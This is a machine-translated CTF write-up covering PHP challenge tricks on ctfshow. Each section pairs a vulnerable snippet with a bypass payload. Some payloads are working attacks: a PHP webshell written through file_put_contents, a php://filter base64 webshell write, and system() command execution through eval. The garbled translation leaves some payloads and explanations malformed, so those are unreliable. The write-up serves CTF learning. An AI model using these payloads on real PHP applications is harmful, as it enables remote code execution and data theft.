Summary of PHP test sites encountered in CTF questions (I)

Introduce

This article mainly summarizes what I am writing ctfshow The problems encountered in the topic are about PHP Test site of . Because only summarizing knowledge points and test sites will be empty , It's not easy to understand , So I summarize the test sites through the questions , Such words are easier to understand .

PHP Function property correlation

One 、

Test site 1 ：intval The function returns... When it passes in a non empty array 1 You can check the details PHP manual .【https://www.php.net/manual/zh/function.intval.php】 Test point two ：preg_match() Can only handle strings , When an array is passed in, it will return false, You can also check the details PHP manual .

Example ：

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

Example analysis ：

Analyzing the above code shows that , Regular matching 0-9, If it matches, it returns true, direct die, But because of preg_match() Can only handle strings , When an array is passed in, it will return false, To bypass the death function . Because I didn't know much about it before intval function , So I chose to look it up directly php manual 【https://www.php.net/manual/zh/function.intval.php】 After checking, I found **intval()** Function to get the integer value of a variable .**intval()** Function by using the specified base base transformation （ The default is decimal ）, Return variable var Of integer The number . intval() Cannot be used for object, Otherwise, it will occur E_NOTICE Error and return 1. in other words , When intval() Function to pass in a non empty array ,intval() The function will return 1, Combined with us preg_match() The passed in array returns false Characteristics of , This question is payload That's pretty clear .

payload：
?num[]=1

【 Technical documentation 】

1、200 Several network security series e-books
2、 Complete kit
3、100 Share src Source code technical documentation
4、 Introduction to the basics of network security 、Linux、web Security 、 Video on attack and defense
5、 Network Security Learning Route
6、ctf Flag race

Two 、

Test site 1 ：PHP Comparison operator === In comparison , Will first determine whether the types of the two strings are equal , Then compare whether the values are equal .

Test point two ：intval（$value,$base） When base by 0 when , Will detect value To determine the hexadecimal used .

Example ：

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){       #   ===  In comparison , Will first determine whether the types of the two strings are equal , Then compare whether the values are equal 
        die("no no no!");
    }
    if(intval($num,0)===4476){ 
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

Example analysis ：

As shown in the figure below , By inquiring php manual , We found that ,intval（$value,$base） When base by 0 when , Will detect value To determine the hexadecimal used , So we can put 4476 convert to 16 Base number , after base by 0 Of intval Function processing , identifies 16 It's binary 4476, To return to flag, Again because === In comparison , Will first determine whether the types of the two strings are equal , Then compare whether the values are equal , Therefore, due to different string types, it will return false, To bypass the death function .

payload:
?num=?num=0x117c

3、 ... and 、

Test site 1 ：strpos() The function finds the first occurrence of a string in another string and returns

Test point two ：intval（$value,$base） When base by 0 when , Will detect value To determine the hexadecimal used .

Example ：

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){      #strpos() The function finds the first occurrence of a string in another string and returns .
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

Example analysis ：

If we can use octal 4476 To bypass , So there's a problem , Because octal needs to start with 0, and strpos() Will match the number 0 return 0,!0 That is to say 1 To execute the death function , So we can add a space before octal , such strpos() Returns the 1, So we put 4476 Convert to 8 Base number 10574 after , Add a space in front of it .

payload as follows ：

?num= 010574

Four 、

Test site 1 ：PHP Comparison operator === In comparison , Will first determine whether the types of the two strings are equal , Then compare whether the values are equal .

Test point two ： stay PHP Variables in strong comparison a、b The two values are different , Require both md5 Bypass method with the same value .

Test point three ：PHP in md5 The array type() function returns falsefalse Characteristics of .

Example ：

if (isset($_POST['a']) and isset($_POST['b'])) {
	if ($_POST['a'] != $_POST['b'])
		if (md5($_POST['a']) === md5($_POST['b']))
			echo $flag;
	else
		print 'Wrong.';
}

Example analysis ：

This problem involves strong comparison md5 type , From the code we can know , requirement a、b The two values are different, but the two values are needed md5 Have the same value , So strong comparison types , We can use md5 The array type() function returns false Characteristics of , Thus make use of false=false To bypass . I have previously written an article summarizing relevant knowledge points. The link is as follows ：https://www.freebuf.com/articles/web/321300.html

payload：

a[]=1&b[]=2

5、 ... and 、

Test site 1 ：in_array () The delta function is going to be Check if there is a value in the array , And when in_array() When the function does not set the third parameter, the comparison is weak .

Test point two ：file_put_contents() The string() function writes a string to a file . If the written string and file name are controllable, it may lead to arbitrary file upload vulnerability .

Example ：

$allow = array();      # Create an empty array 
for ($i=36; $i < 0x36d; $i++) {
    array_push($allow, rand(1,$i));    # stay 1-$i Randomly generate an integer between , Add to array $allow The tail 
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

Example analysis ：

Because I didn't know much about it before in_array() Function, so I looked it up directly PHP manual https://www.php.net/manual/zh/function.in-array.php, I find that this question is in use in_array() Function does not set the third parameter to TRUE, So at this time in_array The comparison of the function is == Weak type comparison of . That is, it will be cast to the same type first , Then compare whether the two values are equal , So when we introduce 1.php Will be cast to a number 1, And the number 1 Just in range(1,24) Array , When the randomly generated number happens to be 1 You can bypass in_array() Function judgement , Cause arbitrary file upload vulnerability . Try a few times more , Until the time when no error is reported , It indicates that a sentence has been successfully passed in . After the visit 1.php Pass again, pass again post Pass in 1=system(‘ls’); You can view the directory , Visit this again flag36d.php, namely post: 1=system('cat flag36d.php'); You can see it in the web source code flag.

Example analysis ：

Because I didn't know much about it before in_array() Function, so I looked it up directly PHP manual https://www.php.net/manual/zh/function.in-array.php, I find that this question is in use in_array() Function does not set the third parameter to TRUE, So at this time in_array The comparison of the function is == Weak type comparison of . That is, it will be cast to the same type first , Then compare whether the two values are equal , So when we introduce 1.php Will be cast to a number 1, And the number 1 Just in range(1,24) Array , When the randomly generated number happens to be 1 You can bypass in_array() Function judgement , Cause arbitrary file upload vulnerability . Try a few times more , Until the time when no error is reported , It indicates that a sentence has been successfully passed in . After the visit 1.php Pass again, pass again post Pass in 1=system(‘ls’); You can view the directory , Visit this again flag36d.php, namely post: 1=system(‘cat flag36d.php’); You can see it in the web source code flag.

payload:

?n=1.php
post:   content=<?php eval($_POST[1]);?>  # Write a sentence 

## 6、 ... and 、
Test site 1 ：**is_numeric()** Function to detect whether a variable is a number or a string of numbers , Returns... If the specified variable is a number and a numeric string TRUE, Otherwise return to FALSE.

Test point two ：php There is priority of operation , and && > = > and
Example ：

include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
}

Example analysis ：

**is_numeric()** Function to detect whether a variable is a number or a string of numbers , Returns... If the specified variable is a number and a numeric string TRUE, Otherwise return to FALSE. See the last eval, There must be a command to execute , This needs to be $v2Pass\; onEnter\; intolifeMake,$v3 need ; ending , But then is_numeric Once handled, it becomes

$vo = $v1 and FALSE and FAlse

but php There is priority of operation , That is to say &&> = > and
According to the operation priority , Execute first = That is, assigned to $a by true,false It's ignored , There will be a train of thought ,payload by

?v1=1&v2=system("tac ctfshow.php")&v3=;
or
?v1=1&v2=var_dump($ctfshow)&v3=; #var_dump()  Function is used to output information about variables , This is used to get ctfshow Information about variables in the class . In order to gain flag

obtain $flag_is_1ce376300x2d8dc70x2d4b870x2d9f0e0x2d1eea5dada15;, among 0x2d Need to replace with -, But a total of 35 There is still one missing , The last one needs to blast to get .

## 7、 ... and 、
Test site 1 ：is_numeric() Function to detect whether a variable is a number or a string of numbers , Returns... If the specified variable is a number and a numeric string true, Otherwise return to false. If the string contains a e Stands for scientific counting , You can also go back to true

Test point two ：call_user_func() Functions are used to call methods or variables , The first parameter is the function being called , The second one is the parameters of the called function .

Test point three ：file_put_contents() The string() function writes a string to a file . If the written string and file name are controllable, it may lead to arbitrary file upload vulnerability .

Test point 4 ： adopt file_put_contents() Function coordination php:// By agreement base64 Write in the form of encoding webshell.
Example ：

<?php
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3); # Example analysis   By adding variables v2 Executed command base64 Encrypted and converted to 16 Hexadecimal string to make variables v4 by ture
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);  # Example analysis   Through the variable v1 call hex2bin Function will be variable v2 Of 16 The hexadecimal string is converted to the original base64 Coding form 
    echo $str;
    file_put_contents($v3,$str);   # Example analysis   By using php://filter Pseudo protocol write webshell
}
else{
    die('hacker');
}

Example analysis ：

First ,get The ginseng v2 and v3,post The ginseng v1;if China needs v4 If it is true, it can be executed , and v4 To be true is v2 The passed parameters should be numbers or numeric strings , meanwhile v2 This is what we want to write webshell, In order to make v2 Is a number or a numeric string , We can put our webshell Convert to base64 code , And then base64 Code to 16 Base number , This is a way to convert to numbers . The local test code is as follows ：

# Local test code 
<?php
$b = base64_encode('<?=`tac *`;');
$b = str_replace("=","",$b);
echo "base64 After encryption :".$b."\n";
$a = call_user_func('bin2hex',$b);  #bin2hex Can be base64 The encoded form is converted to 16 Hexadecimal string form .
echo "16 Base form :".$a."\n";
var_dump(is_numeric($a));

/* Running results 
base64 After encryption :PD89YHRhYyAqYDs
16 Base form :504438395948526859794171594473
bool(true)
*/
?>

explain ：<?= yes php The short tag of , yes echo() Quick usage of , And a little bit more , Namely substr() Get is from the subscript 2 Starting string （ String subscript from 0 Start ）, So we need to add 00 Two digit number
therefore payload by

?v2=00504438395948526859794171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

post:
v1=hex2bin    # adopt hex2bin Function will 16 The hexadecimal string is converted to the original base64 Coding form 

## 8、 ... and 、
Examination site ：sha1() Function properties ,sha1 The function cannot process arrays , If an array is encountered, it will return NULL

Example ：

<?php
highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}

** Example analysis ：**sha1 The function cannot process arrays , If an array is encountered, it will return NULL, So set both variables to array type to get flag.

payload as follows ：

?v2[]=             # Whether these two values are assigned or not does not affect 

post:
v1[]=

## Nine 、
Test site 1 ：parse_str() The function sets the first parameter passed in as a variable , If the second parameter is set , The variable of the first parameter will be stored in the array as an array element .

Example ：

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
    parse_str($v1,$v2);
    if($v2['flag']==md5($v3)){
    	echo $flag;
    }
}

Example analysis ：

After reading the above code, you should know , The key to this problem is parse_str() function , So I checked directly PHP The manual is about parse_str() Introduction to . Link here ：https://www.php.net/parse_str/ After reading, we can find that the function will set the first parameter passed in as a variable , If the second parameter is set , The variable of the first parameter will be stored in the array as an array element . Analyzing the above code, we know that v1 We can control it , And we know v2 Array has flag This key , So we can go through parse_str() Function will be variable v1 Write the variable name and value to the array v2, Then we can cover flag This key is right , also v3 We can control it, so we can bypass the following $v2{[}^{\prime }fla{g}^{\prime }]==md5($v3) And then output flag. This way of thinking has , We can start building payload,payload as follows ：

?v3=1
POST:v1=flag=c4ca4238a0b923820dcc509a6f75849b   #md5 After decryption, it corresponds to 1

## Ten 、
Examination site ： ereg() The matching of functions can be %00 truncation

Example ：

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');
}
// Only 36d People can see flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}

Example analysis ：

**ereg()** The function searches the string specified by as the string specified by the schema , If the mode is found, it returns true, Otherwise return to false. Search is case sensitive for alphabetic characters

**strrev()** Function to reverse the string .**intval()** Function to get the integer value of a variable . First we need to know %00 Can cut off ereg() Function search , Regular expressions will only match %00 Previous content ;0x36d The decimal content of is 877, We need letters in front of us to meet if Regular matching of conditions to skip if sentence , Then the string is inverted to get 877a, next intval() Function takes the integer part to get 877
therefore payload by

Code
?c=a%00778

## 11、 ... and 、
Test site 1 ：**call_user_func()** Function will execute the callback function ,call_user_func() Take the first parameter as a callback function , Other parameters are parameters of the callback function

Test point two ：_() It's a function _() Equivalent to gettext() yes gettext() The extended function of .

Test point three ：get_defined_vars() Function function : Returns an array of all defined variables .

Example ：

<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

$f1 = $_GET['f1'];
$f2 = $_GET['f2'];

if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo " Uh huh ？";
}
function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

Example analysis ：

**call_user_func()** Function takes the first parameter as a callback function , Other parameters are parameters of the callback function

_() It's a function _() Equivalent to gettext() yes gettext() The extended function of . Turn on text Expand , need php The extended directory has php_gettext.dll

# Test code ：
<?php
echo gettext("ctfshownb");
// Output results ：ctfshownb

echo _("ctfshownb");
// Output results ：ctfshownb

get_defined_vars() Function function : Returns an array of all defined variables In this way we can get $flag

The whole execution process is

var_dump(call_user_func(call_user_func($f1,$f2)));
var_dump(call_user_func(call_user_func(_,'get_defined_vars')));
var_dump(call_user_func(get_defined_vars));// The output array 

**payload: **

?f1=_&f2=get_defined_vars

## Twelve 、
Examination site ： call_user_func(） Function properties

Example 1 ：

<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
call_user_func($_POST['ctfshow']);

Example analysis ：

Call directly ctfshow Class getFlag Just the way ,payload by

post:
ctfshow=ctfshow::getFlag

** Add ：**call_user_func(） Function in PHP The introduction in the manual ：

https://www.php.net/manual/zh/function.call-user-func.php

Example 2 ：

<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
if(strripos($_POST['ctfshow'], ":")>-1){
    die("private function");
}
call_user_func($_POST['ctfshow']);

Example analysis ：

Give the colon to... On the basis of the previous question ban 了 , but call_user_func() Support the incoming array form .

call_user_func(array($ctfshow, ‘getFlag’));
That's when it calls ctfshow Medium getFlag Method

therefore payload by

post:
ctfshow[0]=ctfshow&ctfshow[1]=getFlag